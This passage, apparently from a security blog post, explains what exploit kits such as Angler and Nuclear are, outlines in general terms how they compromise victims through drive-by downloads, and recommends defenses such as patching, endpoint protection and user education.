Kits (EK's) are a serious cyber threat today, estimated to be responsible for the vast percentage of malware infections worldwide. Exploit Kits are currently distributed through both public and underground sources. They appeal to a wide range of audiences, from inexperienced hackers to black hat cybercriminals. They create a fast-growing online threat, which targets holes in the everyday software used by billions of people. Criminals embed their packages of dark codes in everything they can, from shopping to news sites. Examples of the most common Exploit Kits today are Angler and Nuclear:
First, What's Exploitation?
- Angler Exploit Kit (EK) – This kit was first identified in 2013 and gained traction because of its characteristic of spreading ransomware, malvertising and even hacktivism campaigns. In an article published by CISCO in 2015, the Angler kit was reported as generating $60M annually from ransomware alone. (Cisco Talos Threat Intelligence)
- Nuclear Exploit Kit - This kit has constantly evolved since 2009, when it appeared for the first time. More recently, Locky Ransomware has been identified as being delivered via the Nuclear Exploit Kit. Nuclear EK has also been offered as a malware-as-a-service business model.
An exploit is malformed data processed by a legitimate application, which takes advantage of vulnerability in that application and allows the attacker to run a malicious code. When an exploit forces the program to behave unexpectedly, an attacker can leverage the disruption to perform other actions, usually malicious, which would not normally be permitted.For example, an attacker might exploit a program in such a way that a second program is silently installed without the users consent or knowledge. When a program is unable to deal with an exploit because of an underlying flaw in its coding or implementation, the flaw is known as vulnerability. For an exploit to be dangerous, an attacker must have ways to deliver it to the vulnerable program. A common threat vector is delivery via email i.e a Word file attachment, with macros.The automatic impulse and general response from the user when he/she sees a warning to about enabling macros is to click Yes. In a nutshell, the EK “tricks” a legitimate application into running the attacker’s code. What's an Exploit Kit?
Exploit Kits (EK's) are programs designed by cyber criminals to find flaws, weaknesses, vulnerabilities or simply mistakes in software development. The Kits infect the software with malware or provide access to a system or a network. These tool kits exploit client-side vulnerabilities, typically targeting the web browser or other programs that a website can invoke (i.e Adobe Reader, Java Runtime, Adobe Flash Player, etc.). The EK's are also designed to download malicious files and inject malicious code into the system after infiltrating it.EK's include many commands that can make a system to behave abnormally, including interrupting a software or hardware execution among other tricks.Once system vulnerability has been exploited, it opens a channel of communication with a command and control center (C&C). After a connection is established, the attacker may issue instructions to download additional malware or move laterally within the victim's network in search of higher value targets.Exploit Kits are deployed in the first stage of a malware attack and play a very important role in the success rate of these attacks. The Exploitation Process
EK's come with pre-written exploit code that target users running insecure or unpatched software applications. While the process of becoming exploited by one of these kits will vary, the procedure usually goes a bit like this:
- Contact the victim: A victim visits a website whose server has been compromised. This process can also happen via phishing where the user receives a link via email, and is redirected to the attacker's landing page.
- Redirect to landing page: The victim is redirected through various intermediary servers. This process can take place via phishing email or malvertising. For webserver compromises, the attack typically using an iframe that's been inserted into the HTML code of the website. Because it can be potentially detected by a traditional AV, the bad guys use obfuscation techniques to avoid detection.
- Profile the victim: The victim lands at a rogue server hosting the EK. In this stage, the victim's system is scanned to detect if the web browser, plugins or OS are vulnerable to exploitation. The attacker can even profile victims, for example, in specific countries who might be more vulnerable.
- Deliver the payload: The Exploit Kit gathers information on the victim and determines the exploit to deliver. If exploit succeeds, a malicious payload (custom malware program) is downloaded to the victim’s computer and executed. Game Over!
The last step involves the payload, which is classified as a drive-by-download, since it happens without the victim’s knowledge. Drive-by attacks have been used to deliver malware for many years, often in the form of an email message or popup window. The exploit from these kits can be launched when visiting legitimate websites and users are less likely to see the attack coming. Why Are Exploit Kits a Concern?
Exploit kits have become one of the more prevalent threats today because they are essentially crimeware. In other words, these are specialized utility programs offered for sale (or rent) by their creators to interested third parties in various cyber crime oriented forums.Cyber crime is no longer the occupation of a limited group of people with deep technical skills. Today, with the advance of EK's, less technically-savvy attackers have found a relatively easy way to attack and infect a large number of users.Some exploit kits like Angler, even come with a user-friendly interface, which enables the attacker to track the evolution of their malware campaigns and adjust the settings for more effective results.Unlike previous forms of malware, which tended to be operated by only a small number of attackers, crimeware can be used by anyone who's able to purchase the “product,” making the potential pool of attackers much larger. Since new exploits can simply be added to an EK's arsenal (just like normal software updates), attackers can also keep using the same tool (with the appropriate updates) over a longer period of time. Conversely, singled focused malware tends to have a shorter lifespan.Long story short, if you have some cash in your hands and some basic skills, you can easily get hold of an Exploit Kit in the underground web (which I strongly advise against). The purpose of this post is to show how exploit kits have become a real concern for us as defenders and for organizations struggling to protect their assets. Why are Exploit Kits Effective?
Just like any software that needs to be updated over time, Exploit Kits are no different. Improving the EK is part of the “product lifecycle.” It's a critical part because, as vendors patch their software to correct vulnerabilities, EKs evolve to find new exploitable holes in the vendors software.Let’s not forget that EK developers are after making as much money as they can in the shortest period of time as possible. As any business that intends to generate revenue, constant product development is necessary. Lots of money goes into making the Kits better. The Angler EK has become more popular because its developers are able to add a new exploit for new vulnerabilities at a very fast pace. When a Zero Day vulnerability is discovered, Angler already had it integrated - especially when it comes to Flash exploits. This is big business - with millions of dollars in revenue - and it's definitely been reflected in the sophistication of the EK's. What do We do About It?
It's well known that anti-virus software alone is not enough to protect organizations and end-users from advanced threats. Traditional anti-viruses are unable to provide 100% of protection. No security solution can. The most sophisticated EK's s are designed to detect and bypass antivirus solutions, and that’s one of the many reasons antiviruses have become ineffective. Antiviruses still have their place working against some executable malware types, as long as the manufacturers are quick enough to discover it in the wild, develop a signature and push it down to all endpoint customers, which is not always possible. To be clear, I'm not advocating anyone not to use a traditional antivirus. Many products do a very good job at detecting known threats.The first stage of a cyberattack typically takes advantage of vulnerabilities at the software's endpoints. Making every effort possible to protect against this stage is ideal place to start. The obvious defense is performing regular patching, especially in user’s browsers, plugins and OS's. At least, this will help to reduce the probability of an attacker using an exploit before a patch can be released, and the organization can roll it out. This may help reduce the attack surface, but it won’t guarantee protection against zero-day vulnerabilities.Augmentation has become a buzzword when we talk about endpoint security. I've heard from many that their antivirus solution is working when it comes to prevent known threats. I agree in some cases. Others state that they've kept their antivirus because of compliance requirements, such as PCI. The main issue has been related to unknown threats delivered via executable malware and EK's.Some recommend an augmentation approach to complement or cover the gap left by the traditional antivirus. Augmentation means that an additional layer of security focused on preventing unknown (and sometimes known) executable and EK type of attacks is put in place.The so called, "next generation endpoint solutions" are the ones focusing on covering this hole. Many are “signatureless,” which makes the solution extremely lightweight for a better user experience. Some organizations feel that what was initially an augmentation, can now be a replacement for their traditional AV. See one of my posts about the many approaches adopted by security companies to combat this and other threats: Endpoint Protection: The first line of defense
. Applying a defensive, in-depth approach starting at the endpoint level is key to preventing a number of threats.Finally, educate and get educated. While technological defenses can be successful at protecting the endpoint, education is probably the most powerful defense you can apply. Users should know how to identify malicious emails and know never to click on unknown links or attachments.Web browsing education is also important to ensure that all company staff is aware of relevant policies regarding acceptable web browsing. Limiting browsing to sites that are relevant to company business can drastically lower the chances of exposure to sites hosting EK's. That said, even the most security conscious user can fall victim to an Exploit Kit. If this does occur, users should be made aware of channels to report a suspected malware infection. Stay Safe !!!